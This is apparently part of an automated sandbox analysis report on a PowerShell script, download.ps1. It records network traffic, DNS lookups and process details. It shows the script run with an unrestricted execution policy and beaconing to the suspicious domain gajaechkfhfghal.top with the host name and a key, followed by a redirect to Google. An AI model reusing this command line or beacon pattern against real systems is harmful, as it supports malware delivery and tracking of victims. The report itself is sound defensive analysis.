                                                                                                                  Dec 23, 2024 13:17:07.570853949 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570871115 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.570873976 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570889950 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.570924044 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.571495056 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.571511030 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.571526051 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.571535110 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.571563959 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.575387001 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.591037035 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.591113091 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.591489077 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.607760906 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.607867956 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.637638092 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.637690067 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.637778997 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.641944885 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.642014027 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.642060041 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.650455952 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.650481939 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.650527000 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.658854008 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.659126043 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.659167051 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.691508055 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.691566944 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.691617966 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:07.695664883 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.695779085 CET8049732172.217.21.36192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:07.695822001 CET4973280192.168.2.4172.217.21.36
                                                                                                                  Dec 23, 2024 13:17:08.316370964 CET4973180192.168.2.445.61.136.138
                                                                                                                  Dec 23, 2024 13:17:08.316734076 CET4973280192.168.2.4172.217.21.36
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 23, 2024 13:17:03.279046059 CET4946753192.168.2.41.1.1.1
                                                                                                                  Dec 23, 2024 13:17:03.678242922 CET53494671.1.1.1192.168.2.4
                                                                                                                  Dec 23, 2024 13:17:05.124254942 CET5028053192.168.2.41.1.1.1
                                                                                                                  Dec 23, 2024 13:17:05.262866020 CET53502801.1.1.1192.168.2.4
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 23, 2024 13:17:03.279046059 CET192.168.2.41.1.1.10xc67cStandard query (0)gajaechkfhfghal.topA (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 13:17:05.124254942 CET192.168.2.41.1.1.10xe34eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 23, 2024 13:17:03.678242922 CET1.1.1.1192.168.2.40xc67cNo error (0)gajaechkfhfghal.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 13:17:05.262866020 CET1.1.1.1192.168.2.40xe34eNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                  • gajaechkfhfghal.top
                                                                                                                  • www.google.com
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.44973145.61.136.138806624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 23, 2024 13:17:03.816092014 CET215OUTGET /aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                  Host: gajaechkfhfghal.top
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 23, 2024 13:17:05.122961998 CET166INHTTP/1.1 302 Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Mon, 23 Dec 2024 12:17:04 GMT
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: keep-alive
                                                                                                                  Location: http://www.google.com


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.449732172.217.21.36806624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 23, 2024 13:17:05.386326075 CET159OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                  Host: www.google.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 23, 2024 13:17:07.207122087 CET1236INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 23 Dec 2024 12:17:06 GMT
                                                                                                                  Expires: -1
                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-epDluNOoLrVXEHvCsvkULQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                  Server: gws
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Set-Cookie: AEC=AZ6Zc-VU8yHmhx7sfC8R81De53MMGkAgYfjYwfATGhr1YOKeMraL7mhdF1o; expires=Sat, 21-Jun-2025 12:17:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                  Set-Cookie: NID=520=rgF4TgcgjpnaeTbOu-xR9lpOK_FPjzaqcpp5NahMf2GifaTdkATNou0Ogz3dvrAFi3NmIOlKCGo0NS1FVfIpJ4yEX5nBZB5seGdtklZl0KJPAypDaswdlAYRZ-J9meF4wilJaUHjZ1NEsVl_ngmCDwgq2hNF8UfPC9_dcXMPNXfyuYKrP0ZHjoLbuG1fGZL9HtUCBuSu; expires=Tue, 24-Jun-2025 12:17:06 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                  Accept-Ranges: none
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Data Raw: 33 63 64 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20
                                                                                                                  Data Ascii: 3cd5<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                                  Dec 23, 2024 13:17:07.207144022 CET224INData Raw: 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f
                                                                                                                  Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"
                                                                                                                  Dec 23, 2024 13:17:07.207159996 CET1236INData Raw: 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 6c 6f 67 6f 73 2f 64 6f 6f 64 6c 65 73 2f 32 30 32 34 2f 73 65 61 73 6f 6e 61 6c 2d 68 6f 6c 69 64 61 79 73 2d 32 30 32 34 2d 36 37 35 33 36 35 31 38 33 37 31 31 30 33 33 33 2d 6c 61 77 2e 67 69
                                                                                                                  Data Ascii: ><meta content="/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif" itemprop="image"><meta content="Seasonal Holidays 2024" property="twitter:title"><meta content="Happy Holidays! #GoogleDoodle" property="twitter:description">
                                                                                                                  Dec 23, 2024 13:17:07.207178116 CET1236INData Raw: 32 34 30 2c 35 39 39 32 30 33 32 2c 32 38 34 32 37 34 34 2c 32 37 39 37 37 39 36 39 2c 32 35 32 32 34 30 34 35 2c 34 36 33 36 2c 31 31 37 33 31 2c 34 37 30 35 2c 32 37 32 38 2c 38 31 33 31 37 2c 31 31 36 34 33 2c 31 30 39 38 30 2c 38 38 34 2c 31
                                                                                                                  Data Ascii: 240,5992032,2842744,27977969,25224045,4636,11731,4705,2728,81317,11643,10980,884,14280,8182,5933,11943,10969,20584,19011,2658,3436,3319,1898,2,21978,9140,761,3838,328,4456,1769,10417,12990,6,10211,686,7852,24,8390,13589,1134,207,5406,6386,1915
                                                                                                                  Dec 23, 2024 13:17:07.207194090 CET1236INData Raw: 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f 30 3a 61 2e 73 74 76 73 63 29 3f 67 6f 6f 67 6c 65 2e 6b 45 49 3d 5f 67 2e 6b 45 49 3a 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 5f 67 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 7d 29
                                                                                                                  Data Ascii: indow.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var g=this||self;function k(){return window.google&&window.google.kOPI||null};var l,m=[];funct
                                                                                                                  Dec 23, 2024 13:17:07.207211971 CET1236INData Raw: 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d 3b 76 61 72 20 64 3b 28 64 3d 67 6f 6f 67 6c 65 29 2e 78 7c 7c 28 64 2e 78 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 29 76 61 72 20
                                                                                                                  Data Ascii: nction(){google.y={};google.sy=[];var d;(d=google).x||(d.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(google.y[c])}google.y[c]=[a,b];return!1});var e;(e=google).sx||(e.sx=function(a){google.sy.push(a)});google.lm=[];var f;(f=g
                                                                                                                  Dec 23, 2024 13:17:07.207230091 CET1236INData Raw: 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69
                                                                                                                  Data Ascii: rap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidden;z-index:998;right:0}.gbto #gbs{background:#fff}#gbx3,#gbx4{background-col
                                                                                                                  Dec 23, 2024 13:17:07.207370043 CET1236INData Raw: 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74
                                                                                                                  Data Ascii: 1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blu
                                                                                                                  Dec 23, 2024 13:17:07.207391024 CET1236INData Raw: 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 2e 67 62 74 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 7a 74 20 2e 67 62 74 73 7b 64 69
                                                                                                                  Data Ascii: ;padding:0 5px;position:relative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbts
                                                                                                                  Dec 23, 2024 13:17:07.207408905 CET1236INData Raw: 69 2c 23 67 62 69 34 69 64 7b 6c 65 66 74 3a 35 70 78 3b 62 6f 72 64 65 72 3a 30 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 70 78 3b 77 69 64 74 68 3a 32 34 70 78 7d 2e 67 62 74 6f
                                                                                                                  Data Ascii: i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none
                                                                                                                  Dec 23, 2024 13:17:07.327945948 CET1236INData Raw: 7d 2e 67 62 6d 6c 31 2d 68 76 72 2c 2e 67 62 6d 6c 31 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 70 6d 20 2e
                                                                                                                  Data Ascii: }.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline


                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:0
                                                                                                                  Start time:07:16:57
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:1
                                                                                                                  Start time:07:16:57
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Reset < >
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a26b30e703746e9d3d0fc66fad9c241501855385aab832fdc6623bb91f201cd3
                                                                                                                    • Instruction ID: 5a6959b6f9fe54b89bc3934c0eb8b27aacb3d7cc168f0d64ce25575ec70c932e
                                                                                                                    • Opcode Fuzzy Hash: a26b30e703746e9d3d0fc66fad9c241501855385aab832fdc6623bb91f201cd3
                                                                                                                    • Instruction Fuzzy Hash: 05E18330A09A4D8FEBA8EF28C8597F977D1FF58310F04426AE84EC7295DF7499458B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 272242a230ed1ed1487eef7f1f82745c2aa37c3724c23fa94d79f0915b94c5b9
                                                                                                                    • Instruction ID: 67c08e43e88f5811ac91fae75292b5ca877b46930702f698dfcaf72349af4dc0
                                                                                                                    • Opcode Fuzzy Hash: 272242a230ed1ed1487eef7f1f82745c2aa37c3724c23fa94d79f0915b94c5b9
                                                                                                                    • Instruction Fuzzy Hash: 36D1A230A09A4D8FEBA8EF28D8657E977D1FF54310F05822EE80DC7295CF74A9418B81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1836766295.00007FFD9BD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd50000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #_L
                                                                                                                    • API String ID: 0-1394456047
                                                                                                                    • Opcode ID: deb5c0dfbe05835109c7d155d031bdd92393ffc33e6f239d8ce7970b35f2d4b5
                                                                                                                    • Instruction ID: 7ab2c7c6d679b996e5f4e81b720c30be35576add85de328aa5604a262d278f16
                                                                                                                    • Opcode Fuzzy Hash: deb5c0dfbe05835109c7d155d031bdd92393ffc33e6f239d8ce7970b35f2d4b5
                                                                                                                    • Instruction Fuzzy Hash: 6B824871A0EA4E4FE7A8DA98886166477E1FF64310F1901FDD05EC72EBDEA4AC41CB41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1836766295.00007FFD9BD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd50000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8d9d2f36a2a13b39a5c0e8175595e95d3d8bd8eaf3a9701c495a493f80f4ae95
                                                                                                                    • Instruction ID: 66e0c44f693341e9c3f3965b78532a70fbb564462919afd7ca3280915f5c140f
                                                                                                                    • Opcode Fuzzy Hash: 8d9d2f36a2a13b39a5c0e8175595e95d3d8bd8eaf3a9701c495a493f80f4ae95
                                                                                                                    • Instruction Fuzzy Hash: 68625871B0EA8E4FE7ACDAA8886166477D1FF54314F0901BDD05EC72EBDEA4AC418B41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1836766295.00007FFD9BD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd50000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bfd9155e963096dea0f70ca22178c6ebca36a8075761ae2aa6f660c771c5b057
                                                                                                                    • Instruction ID: d7d12d3441db5326faf0d6e90b6ea4a03092fa5add18310473e23750709c2704
                                                                                                                    • Opcode Fuzzy Hash: bfd9155e963096dea0f70ca22178c6ebca36a8075761ae2aa6f660c771c5b057
                                                                                                                    • Instruction Fuzzy Hash: 5A226871A0EA8D4FEBA9DAA8886166477E0FF54314F0901FDD05EC71EBDEA4AC41CB41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1836766295.00007FFD9BD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd50000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bd7575756e3aaf2335edf6d3cf17d70c60d28db97c2b94e937a8382c5e5ef8ba
                                                                                                                    • Instruction ID: 50730ec60eb2a58dd082c5408a6ab02cedae3fc33c21dd1d0e6dace0a0a7895c
                                                                                                                    • Opcode Fuzzy Hash: bd7575756e3aaf2335edf6d3cf17d70c60d28db97c2b94e937a8382c5e5ef8ba
                                                                                                                    • Instruction Fuzzy Hash: E1223731A0EA8E4FEBA9DA98886166477E1FF54314F0901BDD05EC71EBDEA4EC41CB41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1836766295.00007FFD9BD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd50000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 071b6665d745941360fc713b4f99a9e031ba7edd9c2d7787c875dab12c9016d9
                                                                                                                    • Instruction ID: f1234eab81388114edf553cfa2cd48f7cf2488e55c5ee8bfa18bedf938a041c8
                                                                                                                    • Opcode Fuzzy Hash: 071b6665d745941360fc713b4f99a9e031ba7edd9c2d7787c875dab12c9016d9
                                                                                                                    • Instruction Fuzzy Hash: FF223631A0EA8D4FEBA9DAA8886166477E1FF54314F1900FDD05EC71EBDEA4AC41CB41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35cb755f78e1fbdff19892033eef7011cf09a5cb6a7c82149fe9e0d96a2e0624
                                                                                                                    • Instruction ID: 5a18befeaf6dec9dc02606216a01f8fd2644a04344014c1a33b0870b87160f21
                                                                                                                    • Opcode Fuzzy Hash: 35cb755f78e1fbdff19892033eef7011cf09a5cb6a7c82149fe9e0d96a2e0624
                                                                                                                    • Instruction Fuzzy Hash: 3FA18170A09A4D8FEBA8EF28D8557E937D1FF58310F04422EE84DC7295DF74A9458B82
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833112510.00007FFD9B9BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9BD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b9bd000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d0224d49f8c7966fc22f4c669dea667d3f795b49c60d15ee4f58ecd5f103377c
                                                                                                                    • Instruction ID: 96c885e5f238b90f1a368f0041420775fade318c755ce9792b61fd3863f5a33f
                                                                                                                    • Opcode Fuzzy Hash: d0224d49f8c7966fc22f4c669dea667d3f795b49c60d15ee4f58ecd5f103377c
                                                                                                                    • Instruction Fuzzy Hash: 8B41497040EFC49FE7968B38D8559523FF0EF52320B1606DFD088CB1A3D625A846CBA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2eef995b5aec7ab706cbd246fac29d4c265ce8e558336acd2fe1adb0aeeb8334
                                                                                                                    • Instruction ID: 10060706996dad1cf74ee5d37c5094ea6349c7e60ca3a15dd63cda8a34d2069c
                                                                                                                    • Opcode Fuzzy Hash: 2eef995b5aec7ab706cbd246fac29d4c265ce8e558336acd2fe1adb0aeeb8334
                                                                                                                    • Instruction Fuzzy Hash: 14318431A1CB4C9FDB5C9B5CD84A6A977E0FBA9721F00422FE449D3251DB70A8558BC2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 531b872ab1221c436234be06e17002cd68960aa143b19f64c11ec621342b0abd
                                                                                                                    • Instruction ID: a0037dd1e393aae416d818fd8bbdf03664bbb46ca849f0606898912242b2db12
                                                                                                                    • Opcode Fuzzy Hash: 531b872ab1221c436234be06e17002cd68960aa143b19f64c11ec621342b0abd
                                                                                                                    • Instruction Fuzzy Hash: 9C312430A1A54EDEFBB49F58DC29BF932D1FF41319F414139D50D860A2CAB87A49CB11
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7b14123b53008c1b6552f478281627d5293a0477c7165b35eac49c202ed3ada7
                                                                                                                    • Instruction ID: 4e538f62359cccf24d27ffee03842423bdfa2fb6e59222fff19ab7f4497fdfb5
                                                                                                                    • Opcode Fuzzy Hash: 7b14123b53008c1b6552f478281627d5293a0477c7165b35eac49c202ed3ada7
                                                                                                                    • Instruction Fuzzy Hash: EA218471A08A0C8FDB58DF9CD84A7E97BE0EBA9321F10822FD449D3255D670A856CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
